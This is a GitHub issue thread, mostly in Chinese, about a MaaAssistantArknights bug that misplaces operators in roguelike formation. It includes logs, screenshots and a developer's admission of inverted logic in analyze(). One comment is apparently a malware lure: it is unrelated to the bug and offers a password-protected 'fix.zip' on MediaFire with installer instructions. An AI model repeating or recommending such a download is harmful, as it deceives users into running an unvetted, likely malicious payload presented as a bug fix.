### ISSUE TITLE
肉鸽 干员编队错位

### ISSUE THREAD

**Issue by YueLengM** [MaaAssistantArknights/MaaAssistantArknights#10386]
> [!warning]
存在未确认的链接，请谨慎访问。
There are unconfirmed links, please visit with caution.

### 在提问之前...

- [X] 我理解 Issue 是用于反馈和解决问题的，而非吐槽评论区，将尽可能提供更多信息帮助问题解决
- [X] 我填写了简短且清晰明确的标题，以便开发者在翻阅 Issue 列表时能快速确定大致问题。而不是“一个建议”、“卡住了”等
- [X] 我已查看最新测试版本的更新内容，并未提及该 Bug 已被修复的情况
- [X] 我已检查了置顶议题（Pinned Issue），确认我的问题未被提及

### 问题描述

编队时总会尝试向后翻页一次，导致肉鸽招募超过8人后，战斗前编队时干员选择错误。

### Version

Resource Version: 太阳甩在身后
UI Version: v5.6.0-beta.1
Core Version: v5.6.0-beta.1

### 日志和配置文件

[asst.bak.log (zip)](https://github.com/user-attachments/files/16763132/asst.bak.zip)
[asst.log](https://github.com/user-attachments/files/16763116/asst.log) 结束任务后log
[gui.log](https://github.com/user-attachments/files/16763117/gui.log)

[gui.json](https://github.com/user-attachments/files/16763131/gui.json)

### 配置信息

- OS: Win10 22H2
- MuMu12 V4.0.5(3284)
- 1280*720
- 240 DPI
- 60 FPS
- [x] 截图增强
- [ ] GPU加速

### 截图或录屏

![MuMu12-20240827-223154](https://github.com/user-attachments/assets/42e350f0-5f2f-4770-b802-c8e123117f97)

![MuMu12-20240827-215525](https://github.com/user-attachments/assets/e14703aa-6693-4bf3-b10f-3c76df4aea2f)

[录屏 (OneDrive)](https://1drv.ms/v/c/544cb2e22f1a9993/EeIkMT1Do7VPq-shJGj0fP0B9RDUrRvlxCGhGUAugeLe2g?e=p2BOsf)

### 还有别的吗？

相关issue: #9328 根据日志对比可能问题不一样，但是里面有更多关联的 issue

## 个人理解

根据日志 L261435~L261437
```log
[2024-08-27 21:43:55.638][INF][Px2374][Tx2c0c] asst::RoguelikeFormationTaskPlugin::clear_and_reselect max_page:  0  oper_count:  8
[2024-08-27 21:43:55.638][TRC][Px2374][Tx2c0c] asst::RoguelikeFormationTaskPlugin::select | enter
[2024-08-27 21:43:55.638][INF][Px2374][Tx2c0c] asst::RoguelikeFormationTaskPlugin::select swipe from page 0 to page 1
```
可以认为`select()`时`cur_page`为 0 ，后续选人时从 0 页向后翻到 1 页导致的选人偏移。

根据上述日志第一行，应该是`clear_and_reselect`导致的
https://github.com/MaaAssistantArknights/MaaAssistantArknights/blob/f50ab269d7eb8185683abe5483dfb3de23f09533/src/MaaCore/Task/Roguelike/RoguelikeFormationTaskPlugin.cpp#L100-L115

根据代码，认为是 #10116 后`analyze`函数变动导致的，没有经过循环直接从 1 减为 0。

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Alan-Charred** [comment]
感谢分享您遇到的问题。
您的判断是正确的，问题出现在未能正确识别当前拥有的干员。
啊……好像是我犯了一个很愚蠢的错误。
analyze() 函数应当在未触底时返回 true。我这逻辑反了。

**Comment by MoYuRuan** [comment]
这里有视频

Uploading 202408292009.mp4…
